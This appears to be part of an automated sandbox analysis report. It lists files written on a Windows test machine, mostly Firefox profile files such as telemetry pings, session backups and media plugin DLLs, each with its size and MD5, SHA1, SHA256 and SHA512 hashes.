SHA2560d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec
SHA5121ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d
-
Filesize
9.8MB
MD5db3632ef37d9e27dfa2fd76f320540ca
SHA1f894b26a6910e1eb53b1891c651754a2b28ddd86
SHA2560513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d
SHA5124490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd
-
Filesize
2.0MB
MD5a6fb59a11bd7f2fa8008847ebe9389de
SHA1b525ced45f9d2a0664f0823178e0ea973dd95a8f
SHA25601c4b72f4deaa634023dbc20a083923657e578651ef1147991417c26e8fae316
SHA512f6d302afa1596397a04b14e7f8d843651bd72df23ee119b494144c828fa371497f043534f60ae5908bc061b593132617264b9d1ea4735dccd971abb135b74c43
-
Filesize
334KB
MD5d29f7e1b35faf20ce60e4ce9730dab49
SHA16beb535c5dc8f9518c656015c8c22d733339a2b6
SHA256e6a4ff786a627dd0b763ccfc8922d2f29b55d9e2f3aa7d1ea9452394a69b9f40
SHA51259d458b6ad32f7de04a85139c5a0351dd39fc0b59472988417ca20ba8ed6cb1d3d5206640d728b092f8460a5f79c0ab5cc73225fba70f8b62798ffd28ed89f1c
-
Filesize
2.1MB
MD5b43e2cc078463b0b16f8de411ef4a5e6
SHA13ee39021500463812cd87d120a4d7308cb05cc95
SHA256f1448782e03c792c65206774eee09c9f4554b4a354ff80b9c70d20c279410c4d
SHA51290b3a7478e175dd91f24ede0d7c71c113bfbe02ec62ac9110fcb2c47c9c7c0c0a892a495d8b9b7059b8730fa2eb8e66a6e66d831f6509674628cd812ef50dde9
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
2.0MB
MD541bfbce19932e1a75259a03ba23bdd33
SHA1af829594dc191d8dc5f0bcdde496d1b98130d754
SHA256efff026f46c677e98f53e834d1f074030d2a33d93289f9bbaa26c47451d63989
SHA512cd22466d28e428f54be72326d3475065711d64e637d03a1c043e66591cd6508b8a88ba1e1fb0b34b48275b6cd5e8ad17346ad032a77d2c87e44fd129e4ff538d
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F52FSLAMJ0Q2RHCJJ5I9.temp
Filesize7KB
MD521c3cdd96f8d8d6f0aa5d05bdfe160f8
SHA11fbcd3e7b736f0106cc5de3adc13aa226beb202d
SHA256710e1ad4166d10efd49fc922dc8909e6f6ce812cb50dd73a28c8d8795dab64f6
SHA5123f87577797a5dc9b5506a9072dad5d37bef896319f8776153dcaf5d1cbcf730e3dbefb5a2db767e2bc1e7996bfe2fcecaa26238edec9d9cbbf250532d12e7ea6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD50e12e70358cf1220d9597e14c8d1ad83
SHA108c81e58fdb39b869ae1ae0e103f5bf3d36f3ce8
SHA256f91112bfaef7681c810fc1796f4bc259deb5cf097c216283f23c96af728dd916
SHA512b7abdd6d4a41597611057108c26d685206b7a70b1888e97af637b4c9990763476950fd3613521cec2889cc4b253625c80b1e4c1598a19e167227a07e433d9f2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\584f33d4-768e-4852-a642-9bec16852a2e
Filesize656B
MD588a40f3ee70d86604d93304d1aef52ac
SHA16fa1c55e9d361b301951ba8eb843014fed22209e
SHA2568419468d0a5a17934d62333b5bf277fb7a05ec9df62720721390607f05ac8b69
SHA51240f25b2ef88234cfaeb61ff14db9df0815ddd07fac95070e1489285fda437672afd67c8f336e8bc3abcf33ae2b0e74d3a66f24f9c39a81d8ebf65ee9b5d12709
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\5f55e7dd-5537-4d8f-8b17-28b2b9dd450b
Filesize10KB
MD53570b95af296f9c28172d1ebee3aee12
SHA1d2fdf5311938bf529f82454d97b64d670b5e2297
SHA2569ed4c09da4b7dc40e6056ff25a53685d16be1a7ef6340127a902568169606983
SHA5129d1176509a3a17d6b0fc4151ad6f342cc7d440ab7728700ef36a269b5952e144c18c706a90d717a3ae5ec3fad16ae95d772098eda59dbb34862660dda8879fc0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\ec7690c1-b9fa-430a-acea-76adfbbd371c
Filesize745B
MD5b47d84272bb8e9942413436dedf9f0eb
SHA19b59415e88e957f7cab0b879a19081f62e0d4b88
SHA256315224d41aa53d1f12b5f63414504ffffdd78036973d01cc2c90293636596471
SHA51268bcfdf2b4971164c58ba3cce8b605e99badd7797f000b82675bd065f1ccdcc3f1dfb795297a1d9e70516b4af796fb067a44793ed6cce1bfe489b5384d2c05bc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\f1cda53f-fd0f-4a31-b47c-4222259b7152
Filesize593B
MD57cca631519ed9ee09118da18529d1e9b
SHA1ee080d660f9aaf66aecc072fe4fca4b846f97710
SHA2562f83b147bc85d550edebe4e6dc146f2bdfeec14007dca584dff15966e8a9cc19
SHA512ba964968dc8667babaaf92ed396922be60a0fdecb7287a1c0a4be0242a4590e78c5c52e4e414797e8306d7d0fd0bf992833b1f65727b552c8988c02519bb8b7a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD5311ed9bed7560cab963b6f00944c0f7f
SHA129c95f401ea5072afdb8735a49c69bad0ecb9a13
SHA25685b37d26cd75a26b4bb797cb6da4d6208ecd2cdf7b995190fd4cc6b7ce84dcaf
SHA5125717a4e651ffb0a7d0f535c8a2c49635e3a0342079ba08f98f6c77e08f30b53d5fc3db7a138590ecf9badead60e03e3a21eefcf45b3b88968626d75f0a0fcaef
-
Filesize
7KB
MD5901f32ace61ae23835ba4e09696b4030
SHA1e4bca68f792c20aca9753d6108cee76412c119c8
SHA2561555a4d532164a7bcac7ae40009eb632e0a121d9770fad75e5c6f8ac3f2fcfa3
SHA5121eeaafe0e370a3e6a39a95a2cc82af8b855bf025df4f4e7e5c4446a091061a56ac92ba39ecbc1d0f4dd8c5a264cfa88d56cf7184cbc01b73bab5f8a94543ded8
-
Filesize
6KB
MD544dde434530ba15a413dc43df079e477
SHA1ad3bdcec8095bcde8837a043dd398b8ddf152d07
SHA256d4a69c057656294369e2a95eee4938586a21c343a3fdb1766f47f4568796f16d
SHA5123dc6d441f49ac14b95152628d24bb484ed63273d168e5978ff460239061f9f5c0ad2385517185a9ca0f2079805c107efbc2c1ad4b539c84e83f15e8d647865d7
-
Filesize
6KB
MD586a4003d27892964dce743007e20925d
SHA14427eaab9af312535a0e16e29b098121943c852f
SHA256c1b2069ac12bae8f6f104efdb7839c6014d614512b1c29fb9fa869af53ca83d1
SHA5125aedc98c555d87bcf2f043b3e467d18806d495318546a2f50592fcab1c752bd9a3f407da2e87b4d8c723b66627025744316a51a6fa3651d09994eff978a4504b
-
Filesize
6KB
MD56d9121a090c3f456c7debea79ddc76dd
SHA19e08859e6adb20aa79c2bdb851ff7451209967f0
SHA2569129799e6781bcf31e8c543caa61d574f41faf5a5cccdaf78c1174e50c9b3446
SHA512abae8f78f3fbe00a76a45b7b0f505aea1e1a6a5a408045690c7ea3b4b36ad6e631b349cb2b123afeaa084cbd16f9a03898c897059306b90034d558d498f4d81e
-
Filesize
6KB
MD57561f3071ab66b3c488122d27a33d86a
SHA16e74c3a9bd2a1d4421ec7a7f395592a71d1b152a
SHA25685d7c9b42e2fbbd4eaab80308abca2d629a7713eb00dc68e44d44b71f6ff70f1
SHA5125c2a4b166ccd05d38a03ce6b11ced1d04dc5efeebb7a43470b6c608050a80c1e9e492a355e48024ef7188d6975ac92053e13bd0c9ff1d695514fced8d24ebc0d
-
Filesize
6KB
MD59909edb4fb9a67ee54172fb32fa0b4fa
SHA19f6432307ec3a383db0e7b016098bd4cd4dafb86
SHA2568ab2c6c0176362ca6cc373f71080b2d32d51afef5acfe2104c491392701c4d2e
SHA5125d988175fe9b846751274fc4d72a86890bcb9ebf705ce797b703598e97801b2c9dbfd0fdc5daf76da374b7eec1b1dbb0a7ac3b44b2d4a00c56215c3a7d9786ff
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionCheckpoints.json.tmp
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionCheckpoints.json.tmp
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5e1c8332457424eab6b8066c802e9cc0c
SHA17d06dd8dfb1d8645703445a5db43c437ed5e865a
SHA256e4632760f1c571e3082b2f2b5a215cd95409b8e15ab0da2a5063f93467bf4477
SHA512cc4c55eb2a7dae0aeb2aa77c8412d6b353d5d2ef9cca630d869015358bb5c52df6399d6a29189d397f49ae0692fdb7644ba5495ae60b49be811bbedf3fb47ebc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5ca9694804c66dd0d7b9c3c267417707a
SHA19ccb75dff5fb8099a515fcfc4f3c691cc86550c0
SHA2567e79117a51e83ed6114a2fe1251b847b39456bf8589b3f47c4b9c03dd5abc282
SHA5128366d6469f3187e36ed537e6f4f2a92ec9609efc228bd7c5d75047099634dc1822248a54ea640d5c6092cf5ab7890a468ee7251c56b26752ff301038f128f53c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD5bece0acf9d7f19d01c7943c54d2ad372
SHA1aef59ca4b0fe97f32db128e103bfb98aee3b5e29
SHA256ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
SHA512105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b